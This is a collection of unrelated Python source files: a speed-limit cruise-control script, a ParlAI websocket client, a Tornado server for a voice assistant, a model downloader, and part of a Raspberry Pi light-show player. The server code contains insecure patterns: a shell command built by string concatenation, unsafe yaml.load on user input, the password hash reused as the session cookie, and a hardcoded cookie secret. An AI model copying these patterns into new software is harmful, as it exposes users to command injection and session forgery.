lps = limit_count / (perf_counter() - counter_timer)
counter_timer = perf_counter()
# print(f'LPS: {lps}')
counter = 0
#print(f'Loop time: {end_timer}\ngs:{start_timer} cs:{t_calc_speed-start_timer} gl:{t_grab_limit-t_calc_speed} cl:{t_calc_limit-t_grab_limit} det:{t_determine-t_calc_limit} ex:{t_execute-t_determine} log:{t_log-t_execute}')
# print(f'Loop time: {end_timer}')
# cv2.waitKey(50)
sleep(sleep_time)
print(pytesseract.get_tesseract_version())
# create a hook manager
hm = pyWinhook.HookManager()
# watch for all keyboard events
hm.KeyDown = OnKeyboardEvent
# set the hook
hm.HookKeyboard()
sct = mss.mss()
#create a thread to process images/send commands
t_speed = threading.Thread(target=current_speed_thread)
t_speed.start()
t_limit = threading.Thread(target=speed_limit_thread)
t_limit.start()
t_worker = threading.Thread(target=work_thread)
t_worker.start()
enabled_lbl.pack()
cur_speed_lbl.pack()
speed_limit_lbl.pack()
cur_cruise_lbl.pack()
accel_lbl.pack()
braking_lbl.pack()
speed_img_lbl.pack()
limit_img_lbl.pack()
window.attributes('-topmost', True)
window.update()
# window.mainloop()
try:
while running:
# update UI
if dirty_ui:
enabled_lbl.configure(text=f'Enabled: {should_execute}')
cur_speed_lbl.configure(text=f'Current: {current_speed}')
speed_limit_lbl.configure(text=f'Limit: {speed_limit}')
cur_cruise_lbl.configure(text=f'Cruise: {current_cruise}')
accel_lbl.configure(text=f'Accelerating: {accelerating}')
braking_lbl.configure(text=f'Braking: {braking}')
if latest_speed_img is not None:
copy = cv_img_to_tk(latest_speed_img)
speed_img_lbl.configure(image=copy)
speed_img_lbl.image = copy
latest_speed_img = None
if latest_limit_img is not None:
copy_l = cv_img_to_tk(latest_limit_img)
limit_img_lbl.configure(image=copy_l)
limit_img_lbl.image = copy_l
latest_limit_img = None
window.update_idletasks()
window.update()
sleep(1/30)
except:
running = False
log_file.close()
raise
#pythoncom.PumpMessages() # wait forever, passing keypresses along
#cv2.destroyAllWindows()
#TODO: Some sort of filtering to throw out random values that make no sense (91, random drops to single digits)
# Option for % offset rather than absolute (ie 5% is 4km/h at 80, 2 at 40, etc)
# UI options to change offset on the fly, other configuration
|
client.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import json
import uuid
import websocket
import time
import threading
from parlai.core.params import ParlaiParser
def _get_rand_id():
"""
:return: The string of a random id using uuid4
"""
return str(uuid.uuid4())
def _prBlueBG(text):
"""
Print given in text with a blue background.
:param text: The text to be printed
"""
print("\033[44m{}\033[0m".format(text), sep="")
def on_message(ws, message):
"""
Prints the incoming message from the server.
:param ws: a WebSocketApp
:param message: json with 'text' field to be printed
"""
incoming_message = json.loads(message)
print("\033[0m\n")
print("Bot: " + incoming_message['text'])
quick_replies = incoming_message.get('quick_replies')
if quick_replies is not None and len(quick_replies) > 0:
print(f"\nOptions: [{'|'.join(quick_replies)}]")
print("\033[44m\n")
def on_error(ws, error):
"""
Prints an error, if occurs.
:param ws: WebSocketApp
:param error: An error
"""
print(error)
def on_close(ws):
"""
Cleanup before closing connection.
:param ws: WebSocketApp
"""
# Reset color formatting if necessary
print("\033[0m")
print("Connection closed")
def _run(ws, id):
"""
Takes user input and sends it to a websocket.
:param ws: websocket.WebSocketApp
"""
while True:
x = input("\033[44m Me: ")
print("\033[0m", end="")
data = {}
data['id'] = id
data['text'] = x
json_data = json.dumps(data)
ws.send(json_data)
time.sleep(1)
if x == "[DONE]":
break
ws.close()
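# Each outgoing frame is a JSON object of the form
# {"id": "<uuid4>", "text": "<user input>"}; typing "[DONE]" sends that final
# frame and then closes the socket.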
def on_open(ws):
"""
Starts a new thread that loops, taking user input and sending it to the websocket.
:param ws: websocket.WebSocketApp that sends messages to a terminal_manager
"""
id = _get_rand_id()
threading.Thread(target=_run, args=(ws, id)).start()
def setup_args():
"""
Set up args, specifically for the port number.
:return: A parser that parses the port from commandline arguments.
"""
parser = ParlaiParser(False, False)
parser_grp = parser.add_argument_group('Terminal Chat')
parser_grp.add_argument(
'--port', default=35496, type=int, help='Port to run the terminal chat server'
)
return parser.parse_args()
if __name__ == "__main__":
opt = setup_args()
port = opt.get('port', 35496)
print("Connecting to port: ", port)
ws = websocket.WebSocketApp(
"ws://localhost:{}/websocket".format(port),
on_message=on_message,
on_error=on_error,
on_close=on_close,
)
ws.on_open = on_open
ws.run_forever()
|
server.py
|
import json
from robot import config, utils, logging, constants, Updater
import base64
import requests
import tornado.web
import tornado.ioloop
from tornado import gen
import tornado.httpserver
import tornado.options
import hashlib
import threading
import asyncio
import subprocess
import os
import time
import yaml
import markdown
import random
logger = logging.getLogger(__name__)
conversation, wukong = None, None
suggestions = [
'现在几点',
'你吃饭了吗',
'上海的天气',
'写一首关于大海的诗',
'来玩成语接龙',
'我有多少邮件',
'你叫什么名字',
'讲个笑话'
]
class BaseHandler(tornado.web.RequestHandler):
def isValidated(self):
return self.get_cookie("validation") == config.get('/server/validate', '')
def validate(self, validation):
return validation == config.get('/server/validate', '')
class MainHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
global conversation, wukong, suggestions
if not self.isValidated():
self.redirect("/login")
return
if conversation:
info = Updater.fetch()
suggestion = random.choice(suggestions)
notices = None
if 'notices' in info:
notices=info['notices']
self.render('index.html', history=conversation.getHistory(), update_info=info, suggestion=suggestion, notices=notices)
else:
self.render('index.html', history=[])
class ChatHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def post(self):
global conversation
if self.validate(self.get_argument('validate')):
if self.get_argument('type') == 'text':
query = self.get_argument('query')
uuid = self.get_argument('uuid')
conversation.doResponse(query, uuid)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
elif self.get_argument('type') == 'voice':
voice_data = self.get_argument('voice')
tmpfile = utils.write_temp_file(base64.b64decode(voice_data), '.wav')
fname, suffix = os.path.splitext(tmpfile)
nfile = fname + '-16k' + suffix
# downsampling
soxCall = 'sox ' + tmpfile + \
' ' + nfile + ' rate 16k'
subprocess.call([soxCall], shell=True, close_fds=True)
utils.check_and_delete(tmpfile)
conversation.doConverse(nfile)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal type'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
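# Request shapes accepted by /chat, as implemented above:
#   type=text : validate=<token>, type=text, query=<utterance>, uuid=<client id>
#   type=voice: validate=<token>, type=voice, voice=<base64-encoded wav data>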
class GetHistoryHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
global conversation
if not self.validate(self.get_argument('validate')):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
res = {'code': 0, 'message': 'ok', 'history': json.dumps(conversation.getHistory())}
self.write(json.dumps(res))
self.finish()
class GetConfigHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.validate(self.get_argument('validate')):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
key = self.get_argument("key", default="")
res = ''
if key == '':
res = {'code': 0, 'message': 'ok', 'config': config.getText(), 'sensitivity': config.get('sensitivity', 0.5)}
else:
res = {'code': 0, 'message': 'ok', 'value': config.get(key)}
self.write(json.dumps(res))
self.finish()
class GetLogHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.validate(self.get_argument('validate')):
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
else:
lines = self.get_argument('lines', default=200)
res = {'code': 0, 'message': 'ok', 'log': logging.readLog(lines)}
self.write(json.dumps(res))
self.finish()
class LogHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
self.render("log.html")
class OperateHandler(BaseHandler):
def post(self):
global wukong
if self.validate(self.get_argument('validate')):
if self.get_argument('type') == 'restart':
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
self.finish()
time.sleep(3)
wukong.restart()
else:
res = {'code': 1, 'message': 'illegal type'}
self.write(json.dumps(res))
self.finish()
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class ConfigHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
self.render('config.html', sensitivity=config.get('sensitivity'))
def post(self):
global conversation
if self.validate(self.get_argument('validate')):
configStr = self.get_argument('config')
try:
yaml.load(configStr)
config.dump(configStr)
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
except:
res = {'code': 1, 'message': 'YAML解析失败,请检查内容'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class DonateHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
return
r = requests.get('https://raw.githubusercontent.com/wzpan/wukong-contrib/master/docs/donate.md')
content = markdown.markdown(r.text, extensions=['codehilite',
'tables',
'fenced_code',
'meta',
'nl2br',
'toc'
])
self.render('donate.html', content=content)
class APIHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if not self.isValidated():
self.redirect("/login")
else:
content = ''
with open(os.path.join(constants.TEMPLATE_PATH, "api.md"), 'r') as f:
content = f.read()
content = markdown.markdown(content, extensions=['codehilite',
'tables',
'fenced_code',
'meta',
'nl2br',
'toc'
])
self.render('api.html', content=content)
class UpdateHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def post(self):
global wukong
if self.validate(self.get_argument('validate')):
if wukong.update():
res = {'code': 0, 'message': 'ok'}
self.write(json.dumps(res))
self.finish()
time.sleep(3)
wukong.restart()
else:
res = {'code': 1, 'message': '更新失败,请手动更新'}
self.write(json.dumps(res))
else:
res = {'code': 1, 'message': 'illegal visit'}
self.write(json.dumps(res))
self.finish()
class LoginHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if self.isValidated():
self.redirect('/')
else:
self.render('login.html', error=None)
@tornado.web.asynchronous
@gen.coroutine
def post(self):
if self.get_argument('username') == config.get('/server/username') and \
hashlib.md5(self.get_argument('password').encode('utf-8')).hexdigest() \
== config.get('/server/validate'):
self.set_cookie("validation", config.get('/server/validate'))
self.redirect("/")
else:
self.render('login.html', error="登录失败")
class LogoutHandler(BaseHandler):
@tornado.web.asynchronous
@gen.coroutine
def get(self):
if self.isValidated():
self.set_cookie("validation", '')
self.redirect("/login")
settings = {
"cookie_secret" : b'*\xc4bZv0\xd7\xf9\xb2\x8e\xff\xbcL\x1c\xfa\xfeh\xe1\xb8\xdb\xd1y_\x1a',
"template_path": "server/templates",
"static_path": "server/static",
"debug": False
}
application = tornado.web.Application([
(r"/", MainHandler),
(r"/login", LoginHandler),
(r"/gethistory", GetHistoryHandler),
(r"/chat", ChatHandler),
(r"/config", ConfigHandler),
(r"/getconfig", GetConfigHandler),
(r"/operate", OperateHandler),
(r"/getlog", GetLogHandler),
(r"/log", LogHandler),
(r"/logout", LogoutHandler),
(r"/api", APIHandler),
(r"/upgrade", UpdateHandler),
(r"/donate", DonateHandler)
], **settings)
def start_server(con, wk):
global conversation, wukong
conversation = con
wukong = wk
if config.get('/server/enable', False):
port = config.get('/server/port', '5000')
try:
asyncio.set_event_loop(asyncio.new_event_loop())
application.listen(int(port))
tornado.ioloop.IOLoop.instance().start()
except Exception as e:
logger.critical('服务器启动失败: {}'.format(e))
def run(conversation, wukong):
t = threading.Thread(target=lambda: start_server(conversation, wukong))
t.start()
|
default_models.py
|
import urllib.request
from pathlib import Path
from threading import Thread
from tqdm import tqdm
default_models = {
"encoder": ("https://drive.google.com/uc?export=download&id=1q8mEGwCkFy23KZsinbuvdKAQLqNKbYf1", 17090379),
# Too large to put on google drive with a direct link...
"synthesizer": ("https://www.dropbox.com/s/r37koa6ho5prz7w/synthesizer.pt?dl=1", 370554559),
"vocoder": ("https://drive.google.com/uc?export=download&id=1cf2NO6FtI0jDuy8AV3Xgn6leO6dHjIgu", 53845290),
}
class DownloadProgressBar(tqdm):
def update_to(self, b=1, bsize=1, tsize=None):
if tsize is not None:
self.total = tsize
self.update(b * bsize - self.n)
def download(url: str, target: Path, bar_pos=0):
# Ensure the directory exists
target.parent.mkdir(exist_ok=True, parents=True)
desc = f"Downloading {target.name}"
with DownloadProgressBar(unit="B", unit_scale=True, miniters=1, desc=desc, position=bar_pos, leave=False) as t:
urllib.request.urlretrieve(url, filename=target, reporthook=t.update_to)
def ensure_default_models(models_dir: Path):
# Define download tasks
jobs = []
for model_name, (url, size) in default_models.items():
target_path = models_dir / "default" / f"{model_name}.pt"
if target_path.exists():
if target_path.stat().st_size != size:
print(f"File {target_path} is not of expected size, redownloading...")
else:
continue
thread = Thread(target=download, args=(url, target_path, len(jobs)))
thread.start()
jobs.append((thread, target_path, size))
# Run and join threads
for thread, target_path, size in jobs:
thread.join()
assert target_path.stat().st_size == size, \
f"Download for {target_path.name} failed. You may download models manually instead. Open an issue if the " \
f"problem is recurrent.\nhttps://drive.google.com/drive/folders/1fU6umc5uQAVR2udZdHX-lDgXYzTyqG_j"
|
synchronized_lights.py
|
#!/usr/bin/env python
#
# Licensed under the BSD license. See full license in LICENSE file.
# http://www.lightshowpi.org/
#
# Author: Todd Giles (todd@lightshowpi.org)
# Author: Chris Usey (chris.usey@gmail.com)
# Author: Ryan Jennings
# Author: Paul Dunn (dunnsept@gmail.com)
# Author: Tom Enos (tomslick.ca@gmail.com)
"""Play any audio file and synchronize lights to the music
When executed, this script will play an audio file and turn on and off
N channels of lights (by default the first 8 GPIO channels on the
Raspberry Pi) in time with the music being played. Many
types of audio files are supported (see decoder.py below), but it has
only been tested with wav and mp3 at the time of this writing.
The timing of the lights turning on and off is based upon the frequency
response of the music being played. A short segment of the music is
analyzed via FFT to get the frequency response across each defined
channel in the audio range. Each light channel is then faded in and
out based upon the amplitude of the frequency response in the
corresponding audio channel. Fading is accomplished with a software
PWM output. Each channel can also be configured to simply turn on and
off as the frequency response in the corresponding channel crosses a
threshold.
FFT calculation can be CPU intensive and in some cases can adversely
affect playback of songs (especially if attempting to decode the song
as well, as is the case for an mp3). For this reason, the FFT
calculations are cached after the first time a new song is played.
The values are cached in a gzipped text file in the same location as the
song itself. Subsequent requests to play the same song will use the
cached information and not recompute the FFT, thus reducing CPU
utilization dramatically and allowing for clear music playback of all
audio file types.
Recent optimizations have improved this dramatically and most users are
no longer reporting adverse playback of songs even on the first
playback.
Sample usage:
To play an entire list -
sudo python synchronized_lights.py --playlist=/home/pi/music/.playlist
To play a specific song -
sudo python synchronized_lights.py --file=/home/pi/music/jingle_bells.mp3
Third party dependencies:
alsaaudio: for audio input/output
http://pyalsaaudio.sourceforge.net/
decoder.py: decoding mp3, ogg, wma, ...
https://pypi.python.org/pypi/decoder.py/1.5XB
numpy: for FFT calculation
http://www.numpy.org/
"""
import ConfigParser
import argparse
import atexit
import audioop
from collections import deque
import cPickle
import errno
import json
import logging as log
import os
import random
import subprocess
import signal
import stat
import sys
import time
import wave
import curses
import bright_curses
import mutagen
from Queue import Queue, Empty
from threading import Thread
import alsaaudio as aa
import decoder
import numpy as np
from numpy import where, clip, round, nan_to_num
import Platform
import fft
from prepostshow import PrePostShow
import RunningStats
# Make sure SYNCHRONIZED_LIGHTS_HOME environment variable is set
HOME_DIR = os.getenv("SYNCHRONIZED_LIGHTS_HOME")
if not HOME_DIR:
print("Need to setup SYNCHRONIZED_LIGHTS_HOME environment variable, see readme")
sys.exit()
LOG_DIR = HOME_DIR + '/logs'
# logging levels
levels = {'DEBUG': log.DEBUG,
'INFO': log.INFO,
'WARNING': log.WARNING,
'ERROR': log.ERROR,
'CRITICAL': log.CRITICAL}
# Arguments
parser = argparse.ArgumentParser()
parser.add_argument('--log', default='INFO',
help='Set the logging level. levels:INFO, DEBUG, WARNING, ERROR, CRITICAL')
file_group = parser.add_mutually_exclusive_group()
file_group.add_argument('--playlist', default="playlist_path",
help='Playlist to choose song from.')
file_group.add_argument('--file', help='path to the song to play (required if no '
'playlist is designated)')
cache_group = parser.add_mutually_exclusive_group()
cache_group.add_argument('--readcache', type=bool, default=True,
help='read light timing from cache if available. Default: true')
cache_group.add_argument('--createcache', action="store_true",
help='create light timing cache without audio playback or lightshow.')
if parser.parse_args().createcache:
parser.set_defaults(readcache=False)
# Setup log file
log.basicConfig(filename=LOG_DIR + '/music_and_lights.play.dbg',
format='[%(asctime)s] %(levelname)s {%(pathname)s:%(lineno)d} - %(message)s',
level=log.INFO)
level = levels.get(parser.parse_args().log.upper())
log.getLogger().setLevel(level)
# import hardware_controller
import hardware_controller
hc = hardware_controller.Hardware()
# get copy of configuration manager
cm = hc.cm
parser.set_defaults(playlist=cm.lightshow.playlist_path)
args = parser.parse_args()
class Lightshow(object):
def __init__(self):
self.stream = None
self.fm_process = None
self.streaming = None
self.sample_rate = None
self.num_channels = None
self.music_file = None
self.fft_calc = None
self.light_delay = None
self.cache_found = None
self.cache_matrix = None
self.cache_filename = None
self.config_filename = None
self.song_filename = None
self.terminal = None
self.output = lambda raw_data: None
self.mean = np.array([12.0 for _ in range(cm.hardware.gpio_len)], dtype='float32')
self.std = np.array([1.5 for _ in range(cm.hardware.gpio_len)], dtype='float32')
self.attenuate_pct = cm.lightshow.attenuate_pct
self.sd_low = cm.lightshow.SD_low
self.sd_high = cm.lightshow.SD_high
self.decay_factor = cm.lightshow.decay_factor
self.decay = np.zeros(cm.hardware.gpio_len, dtype='float32')
self.physical_gpio_len = cm.hardware.physical_gpio_len
self.network = hc.network
self.server = self.network.networking == 'server'
self.client = self.network.networking == "client"
if cm.lightshow.use_fifo:
if os.path.exists(cm.lightshow.fifo):
os.remove(cm.lightshow.fifo)
os.mkfifo(cm.lightshow.fifo, 0777)
self.chunk_size = cm.audio_processing.chunk_size # Use a multiple of 8
atexit.register(self.exit_function)
# Remove traceback on Ctrl-C
signal.signal(signal.SIGINT, lambda x, y: sys.exit(0))
signal.signal(signal.SIGTERM, lambda x, y: sys.exit(0))
if cm.terminal.enabled:
self.terminal = bright_curses.BrightCurses(cm.terminal)
curses.wrapper(self.launch_curses)
def exit_function(self):
"""atexit function"""
if self.server:
self.network.set_playing()
self.network.broadcast([0. for _ in range(cm.hardware.gpio_len)])
time.sleep(1)
self.network.unset_playing()
hc.clean_up()
if cm.fm.enabled:
self.fm_process.kill()
if self.network.network_stream:
self.network.close_connection()
if cm.lightshow.mode == 'stream-in':
try:
self.streaming.stdin.write("q")
except IOError:
pass
os.kill(self.streaming.pid, signal.SIGINT)
if cm.lightshow.use_fifo:
os.unlink(cm.lightshow.fifo)
def update_lights(self, matrix):
"""Update the state of all the lights
Update the state of all the lights based upon the current
frequency response matrix
:param matrix: row of data from cache matrix
:type matrix: list
"""
brightness = matrix - self.mean + (self.std * 0.5)
brightness = (brightness / (self.std * (self.sd_low + self.sd_high))) \
* (1.0 - (self.attenuate_pct / 100.0))
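# i.e. each channel's FFT level is roughly z-scored against its running
# mean/std, rescaled by the configured SD window, then attenuated by
# attenuate_pct before being clipped to 0..1 below.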
# ensure that the brightness levels are in the correct range
brightness = clip(brightness, 0.0, 1.0)
# brightness = round(brightness, decimals=3)
brightness = nan_to_num(brightness)
# calculate light decay rate if used
if self.decay_factor > 0:
self.decay = where(self.decay <= brightness,
brightness,
self.decay)
brightness = where(self.decay <= brightness,
brightness,
self.decay)
self.decay = where(self.decay - self.decay_factor > 0,
self.decay - self.decay_factor,
0)
# broadcast to clients if in server mode
if self.server:
self.network.broadcast(brightness)
if self.terminal:
self.terminal.curses_render(brightness)
return
# in the instance a single channel is defined convert scalar back into array
if not hasattr(brightness, "__len__"):
brightness = np.array([brightness])
for pin in range(len(brightness[:self.physical_gpio_len])):
hc.set_light(pin, True, brightness[pin])
if hc.led:
if cm.led.led_channel_configuration == "EXTEND":
leds = brightness[self.physical_gpio_len:]
else:
leds = brightness[:cm.hardware.gpio_len]
for led_instance in hc.led:
led_instance.write_all(leds)
def set_fm(self):
pi_version = Platform.pi_version()
srate = str(int(self.sample_rate / (1 if self.num_channels > 1 else 2)))
fm_command = ["sudo",
cm.home_dir + "/bin/pifm",
"-",
cm.fm.frequency,
srate,
"stereo" if self.num_channels > 1 else "mono"]
if pi_version >= 2:
fm_command = ["sudo",
cm.home_dir + "/bin/pi_fm_rds",
"-audio", "-", "-freq",
cm.fm.frequency,
"-srate",
srate,
"-nochan",
"2" if self.num_channels > 1 else "1"]
log.info("Sending output as fm transmission")
with open(os.devnull, "w") as dev_null:
self.fm_process = subprocess.Popen(fm_command,
stdin=subprocess.PIPE,
stdout=dev_null)
self.output = lambda raw_data: self.fm_process.stdin.write(raw_data)
def set_audio_device(self):
if cm.fm.enabled:
self.set_fm()
elif cm.lightshow.audio_out_card != '':
if cm.lightshow.mode == 'stream-in':
self.num_channels = 2
output_device = aa.PCM(aa.PCM_PLAYBACK, aa.PCM_NORMAL, cm.lightshow.audio_out_card)
output_device.setchannels(self.num_channels)
output_device.setrate(self.sample_rate)
output_device.setformat(aa.PCM_FORMAT_S16_LE)
output_device.setperiodsize(self.chunk_size)
self.output = lambda raw_data: output_device.write(raw_data)
def set_audio_source(self):
stream_reader = None
outq = None
if cm.lightshow.mode == 'audio-in':
# Open the input stream from default input device
self.streaming = aa.PCM(aa.PCM_CAPTURE, aa.PCM_NORMAL, cm.lightshow.audio_in_card)
self.streaming.setchannels(self.num_channels)
self.streaming.setformat(aa.PCM_FORMAT_S16_LE) # Expose in config if needed
self.streaming.setrate(self.sample_rate)
self.streaming.setperiodsize(self.chunk_size)
stream_reader = lambda: self.streaming.read()[-1]
elif cm.lightshow.mode == 'stream-in':
outq = Queue()
if cm.lightshow.use_fifo:
self.streaming = subprocess.Popen(cm.lightshow.stream_command_string,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
preexec_fn=os.setsid)
io = os.open(cm.lightshow.fifo, os.O_RDONLY | os.O_NONBLOCK)
stream_reader = lambda: os.read(io, self.chunk_size)
outthr = Thread(target=self.enqueue_output, args=(self.streaming.stdout, outq))
else:
# Open the input stream from command string
self.streaming = subprocess.Popen(cm.lightshow.stream_command_string,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stream_reader = lambda: self.streaming.stdout.read(self.chunk_size)
outthr = Thread(target=self.enqueue_output, args=(self.streaming.stderr, outq))
outthr.daemon = True
outthr.start()
return stream_reader,outq
def audio_in(self):
"""Control the lightshow from audio coming in from a real time audio"""
self.sample_rate = cm.lightshow.input_sample_rate
self.num_channels = cm.lightshow.input_channels
stream_reader,outq = self.set_audio_source()
log.debug("Running in %s mode - will run until Ctrl+C is pressed" % cm.lightshow.mode)
print "Running in %s mode, use Ctrl+C to stop" % cm.lightshow.mode
# setup light_delay.
chunks_per_sec = ((16 * self.num_channels * self.sample_rate) / 8) / self.chunk_size
light_delay = int(cm.lightshow.light_delay * chunks_per_sec)
matrix_buffer = deque([], 1000)
self.set_audio_device()
# Start with these as our initial guesses - will calculate a rolling mean / std
# as we get input data.
# preload running_stats to avoid errors, and give us a show that looks
# good right from the start
count = 2
running_stats = RunningStats.Stats(cm.hardware.gpio_len)
running_stats.preload(self.mean, self.std, count)
hc.initialize()
fft_calc = fft.FFT(self.chunk_size,
self.sample_rate,
cm.hardware.gpio_len,
cm.audio_processing.min_frequency,
cm.audio_processing.max_frequency,
cm.audio_processing.custom_channel_mapping,
cm.audio_processing.custom_channel_frequencies,
1)
if self.server:
self.network.set_playing()
songcount = 0
# Listen on the audio input device until CTRL-C is pressed
while True:
if cm.lightshow.mode == 'stream-in':
try:
streamout = outq.get_nowait().strip('\n\r')
except Empty:
pass
else:
print streamout
if cm.lightshow.stream_song_delim in streamout:
songcount+=1
if cm.lightshow.songname_command:
streamout = streamout.replace('\033[2K','')
streamout = streamout.replace(cm.lightshow.stream_song_delim,'')
streamout = streamout.replace('"','')
os.system(cm.lightshow.songname_command + ' "Now Playing ' + streamout + '"')
if cm.lightshow.stream_song_exit_count > 0 and songcount > cm.lightshow.stream_song_exit_count:
break
try:
data = stream_reader()
except OSError as err:
if err.errno == errno.EAGAIN or err.errno == errno.EWOULDBLOCK:
continue
try:
self.output(data)
except aa.ALSAAudioError:
continue
if len(data):
# if the maximum of the absolute value of all samples in
# data is below a threshold we will disregard it
audio_max = audioop.max(data, 2)
if audio_max < 250:
# we will fill the matrix with zeros and turn the lights off
matrix = np.zeros(cm.hardware.gpio_len, dtype="float32")
log.debug("below threshold: '" + str(audio_max) + "', turning the lights off")
else:
matrix = fft_calc.calculate_levels(data)
running_stats.push(matrix)
self.mean = running_stats.mean()
self.std = running_stats.std()
matrix_buffer.appendleft(matrix)
if len(matrix_buffer) > light_delay:
matrix = matrix_buffer[light_delay]
self.update_lights(matrix)
def load_custom_config(self):
"""
Load custom configuration settings for file config_filename
"""
"""
example usage
your song
carol-of-the-bells.mp3
First run your playlist (or single files) to create your sync files. This will
create a file in the same directory as your music file.
.carol-of-the-bells.mp3.cfg
DO NOT EDIT the existing [fft] section; editing it will cause your sync files to be ignored.
If you want to use an override you need to add the appropriate section
Then add the options you wish to use, but do not add an option you do not
want to use, as this will set that option to None and could crash your lightshow.
Look at defaults.cfg for exact usages of each option
[custom_lightshow]
always_on_channels =
always_off_channels =
invert_channels =
preshow_configuration =
preshow_script =
postshow_configuration =
postshow_script =
[custom_audio_processing]
min_frequency =
max_frequency =
custom_channel_mapping =
custom_channel_frequencies =
Note: DO NOT EDIT THE existing section [fft]
Note: If you use any of the options in "custom_audio_processing" your sync files will be
automatically regenerated after every change. This is normal as your sync file needs
to match these new settings. After they have been regenerated you will see that they
now match the settings in [fft], and you will not have to regenerate them again
unless you make further changes.
Note: Changes made in "custom_lightshow" do not affect the sync files, so you will not need
to regenerate them after making changes.
"""
if os.path.isfile(self.config_filename):
config = ConfigParser.RawConfigParser(allow_no_value=True)
with open(self.config_filename) as f:
config.readfp(f)
if config.has_section('custom_lightshow'):
lsc = "custom_lightshow"
always_on = "always_on_channels"
if config.has_option(lsc, always_on):
hc.always_on_channels = map(int, config.get(lsc, always_on).split(","))
always_off = "always_off_channels"
if config.has_option(lsc, always_off):
hc.always_off_channels = map(int, config.get(lsc, always_off).split(","))
inverted = "invert_channels"
if config.has_option(lsc, inverted):
hc.inverted_channels = map(int, config.get(lsc, inverted).split(","))
# setup up custom preshow
has_preshow_configuration = config.has_option(lsc, 'preshow_configuration')
has_preshow_script = config.has_option(lsc, 'preshow_script')
if has_preshow_configuration or has_preshow_script:
preshow = None
try:
preshow_configuration = config.get(lsc, 'preshow_configuration')
except ConfigParser.NoOptionError:
preshow_configuration = None
try:
preshow_script = config.get(lsc, 'preshow_script')
except ConfigParser.NoOptionError:
preshow_script = None
if preshow_configuration and not preshow_script:
try:
preshow = json.loads(preshow_configuration)
except (ValueError, TypeError) as error:
msg = "Preshow_configuration not defined or not in JSON format."
log.error(msg + str(error))
else:
if os.path.isfile(preshow_script):
preshow = preshow_script
cm.lightshow.preshow = preshow
# setup postshow
has_postshow_configuration = config.has_option(lsc, 'postshow_configuration')
has_postshow_script = config.has_option(lsc, 'postshow_script')
if has_postshow_configuration or has_postshow_script:
postshow = None
postshow_configuration = config.get(lsc, 'postshow_configuration')
postshow_script = config.get(lsc, 'postshow_script')
if postshow_configuration and not postshow_script:
try:
postshow = json.loads(postshow_configuration)
except (ValueError, TypeError) as error:
msg = "Postshow_configuration not defined or not in JSON format."
log.error(msg + str(error))
else:
if os.path.isfile(postshow_script):
postshow = postshow_script
cm.lightshow.postshow = postshow
if config.has_section('custom_audio_processing'):
if config.has_option('custom_audio_processing', 'min_frequency'):
cm.audio_processing.min_frequency = \
config.getfloat('custom_audio_processing', 'min_frequency')
if config.has_option('custom_audio_processing', 'max_frequency'):
cm.audio_processing.max_frequency = \
config.getfloat('custom_audio_processing', 'max_frequency')
if config.has_option('custom_audio_processing', 'custom_channel_mapping'):
temp = config.get('custom_audio_processing', 'custom_channel_mapping')
cm.audio_processing.custom_channel_mapping = \
map(int, temp.split(',')) if temp else 0
if config.has_option('custom_audio_processing', 'custom_channel_frequencies'):
temp = config.get('custom_audio_processing', 'custom_channel_frequencies')
cm.audio_processing.custom_channel_frequencies = \
map(int, temp.split(',')) if temp else 0
def setup_audio(self):
"""Setup audio file
and setup the output. device.output is a lambda that will send data to
fm process or to the specified ALSA sound card
"""
# Set up audio
force_header = False
if any([ax for ax in [".mp4", ".m4a", ".m4b"] if ax in self.song_filename]):
force_header = True
self.music_file = decoder.open(self.song_filename, force_header)
self.sample_rate = self.music_file.getframerate()
self.num_channels = self.music_file.getnchannels()
self.fft_calc = fft.FFT(self.chunk_size,
self.sample_rate,
cm.hardware.gpio_len,
cm.audio_processing.min_frequency,
cm.audio_processing.max_frequency,
cm.audio_processing.custom_channel_mapping,
cm.audio_processing.custom_channel_frequencies)
# setup output device
self.set_audio_device()
chunks_per_sec = ((16 * self.num_channels * self.sample_rate) / 8) / self.chunk_size
self.light_delay = int(cm.lightshow.light_delay * chunks_per_sec)
# Output a bit about what we're about to play to the logs
num_frames = str(self.music_file.getnframes() / self.sample_rate)
log.info("Playing: " + self.song_filename + " (" + num_frames + " sec)")
def setup_cache(self):
"""Setup the cache_matrix, std and mean
loading them from a file if it exists, otherwise create empty arrays to be filled
:raise IOError:
"""
# create empty array for the cache_matrix
self.cache_matrix = np.empty(shape=[0, cm.hardware.gpio_len])
self.cache_found = False
# The values 12 and 1.5 are good estimates for first time playing back
# (i.e. before we have the actual mean and standard deviations
# calculated for each channel).
